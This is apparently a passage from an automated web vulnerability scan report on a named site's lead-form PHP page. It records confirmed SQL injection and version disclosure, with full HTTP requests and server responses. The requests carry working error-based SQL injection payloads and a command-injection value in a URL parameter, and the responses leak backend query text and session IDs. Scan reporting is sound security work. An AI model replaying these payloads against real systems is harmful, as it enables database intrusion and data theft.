Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /ppc/leadflow/hins00/project.php

/ppc/leadflow/hins00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%..

Identified Cookie

PHPSESSID

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 14:34:39 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=npihp24902e7n3sk535t1v0c13; path=/
Content-Length: 3901
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'Duplicate entry '_!@4dilemma:1' for key 1
Apache Version Disclosure

Apache Version Disclosure

2 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /ppc/leadflow/hins00/project.php

/ppc/leadflow/hins00/project.php

http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%..

Extracted Version

Apache/2.2.9 (Fedora)

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 14:34:39 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=npihp24902e7n3sk535t1v0c13; path=/
Content-Length: 3901
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'Duplicate entry '_!@4dilemma:1' for key 1
- /ppc/leadflow/hins00/project.php

/ppc/leadflow/hins00/project.php

http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=%22%26%20ping%20-n%2026%20127.0.0.1%20..

Extracted Version

2.2.9 (Fedora)

Request

GET /ppc/leadflow/hins00/project.php?catId=%22%26%20ping%20-n%2026%20127.0.0.1%20%26&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=4hbjq2ee8jsoc3p3qf83henj24
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:19:48 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5068
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId="& ping -n 26 127.0.0.1 &&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId="& ping -n 26 127.0.0.1 &&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId="& ping -n 26 127.0.0.1 &&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId="& ping -n 26 127.0.0.1 &&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId="& ping -n 26 127.0.0.1 &&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId="& ping -n 26 127.0.0.1 &&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId="& ping -n 26 127.0.0.1 &&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId="& ping -n 26 127.0.0.1 &&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId="& ping -n 26 127.0.0.1 &&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId="& ping -n 26 127.0.0.1 &&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'Duplicate entry '_!@4dilemma:1' for key 1
PHP Version Disclosure

PHP Version Disclosure

2 TOTAL
LOW
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.
- /ppc/leadflow/hins00/project.php

/ppc/leadflow/hins00/project.php

http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%..

Extracted Version

PHP/5.2.6

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 14:34:39 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=npihp24902e7n3sk535t1v0c13; path=/
Content-Length: 3901
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'Duplicate entry '_!@4dilemma:1' for key 1
- /ppc/leadflow/hins00/project.php

/ppc/leadflow/hins00/project.php

http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=%22%26%20ping%20-n%2026%20127.0.0.1%20..

Extracted Version

PHP/5.2.6

Request

GET /ppc/leadflow/hins00/project.php?catId=%22%26%20ping%20-n%2026%20127.0.0.1%20%26&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=4hbjq2ee8jsoc3p3qf83henj24
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:19:48 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5068
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId="& ping -n 26 127.0.0.1 &&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId="& ping -n 26 127.0.0.1 &&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId="& ping -n 26 127.0.0.1 &&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId="& ping -n 26 127.0.0.1 &&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId="& ping -n 26 127.0.0.1 &&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId="& ping -n 26 127.0.0.1 &&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId="& ping -n 26 127.0.0.1 &&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId="& ping -n 26 127.0.0.1 &&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId="& ping -n 26 127.0.0.1 &&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId="& ping -n 26 127.0.0.1 &&iusrc='+(select 1 and row(1,1)>(select 